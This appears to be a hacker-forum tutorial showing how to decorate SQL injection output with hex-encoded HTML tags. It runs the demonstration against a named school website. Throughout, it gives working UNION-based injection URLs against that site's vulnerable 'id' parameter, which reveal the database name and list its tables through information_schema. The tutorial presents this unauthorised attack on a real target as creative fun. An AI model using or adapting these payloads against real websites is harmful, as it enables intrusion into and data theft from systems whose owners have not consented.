ADDING HTML IN SQL INJECTION ( SQLI FUN )

Introduction:

In this tutorial i will show you how to add HTML tags and designs in your SQL Injection queries..




Purpose:

-----> By using HTML tags in our SQLi query, we can arrange the output in a proper way.

-----> Sometimes the result of our query appears in the source of the webpage or in the title or sometimes in the URL. In that case we add HTML tags to make it more visible on the webpage.





-----> I don't know about you guys but as you can see i like Colors and decoration .. ALOT .. 


Tutorial: 

First of all, i assume you guys have sound knowledge of SQL injection and Basic HTML.

For this Tutorial .. The site I'm going to inject is :

hxxp://www.dbhspgoa.edu.in


Here is the vulnerable link where parameter 'id' is vulnerable to a very simple SQLi.

hxxp://dbhspgoa.edu.in/Article.php?id=92


So, lets start with some very basic injection and i can quickly see that there are 9 Columns here.

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9--




And I will inject in 4th column. so Lets get the database name in 4th column.

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(database()),5,6,7,8,9--




Now, look at the database name. Even though it is visible ( not in the source code but on the proper page ) but font size is very small .. Don't know about you .. but i don't like it. 

Now, let me show you the wonders of HTML tags.

We can always add HTML in our SQLi query. Sometimes we can write it directly enclosed in single quotes like :


concat ('<opening_tags>', QUERY , '<closing_tags>')

But most of the times this syntax is not allowed and we have to convert our HTML tags in HEX . like ..


concat(0xHEX_value_of_opening_tag , QUERY , 0xHEX_value_of_closing_tag)




Notice these 0x here .. This means that what ever is written after this .. Decode it from HEX before executing.



Following are the basic usage of these tags. You can use your creativity and endless imagination.



Example 1:



Lets start with an HTML tag called <font>.



Usage : <font size="8" color="red"> MakMan </font>



I'm going to use this tag in our query but in this website it doesn't allow to use HTML tags directly so we have to convert to HEX first. Just follow the syntax.


Now my format should be:

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0xHEX_value_of_opening_tag,database(),0xHEX_value_of_closing_tag),5,6,7,8,9--


To convert in HEX, you can use many online tools. Just google :String to HEX converter
After converting my opening and closing tags in this case.



Opening_tag = <font size="8" color="red"> ---- HEX ---> 3c666f6e742073697a653d22382220636f6c6f723d22726564223e



Closing_tag = </font> ---- HEX ---> 3c2f666f6e743e




Putting these HEX values in my format. My query will become:




hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,concat(0x3c666f6e742073697a653d22382220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e),5,6,7,8,9--





Look at the Result now .. Sweet 





Example 2:

Mostly people write their names in SQL Injection with their query. Lets try that.

Creativity has no boundaries. 

My HTML Syntax before converting to HEX (Just to show you guys what I'm doing, It will not work You have to Convert it to HEX):

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x<br><font face='calibri' size="5" color="green">MakMan</font><font face='Impact' size="4" color="red">,table_name,0x</font>,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


My HTML Syntax after converting it to HEX:

hxxp://dbhspgoa.edu.in/Article.php?id=92+and+0+UNION+SELECT+1,2,3,group_concat(0x3c62723e3c666f6e7420666163653d2763616c69627269272073697a653d22352220636f6c6f723d​22677265656e223e4d616b4d616e202d2d2d3e3c2f666f6e743e3c666f6e7420666163653d27496d​70616374272073697a653d22342220636f6c6f723d22726564223e,table_name,0x3c2f666f6e743e),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--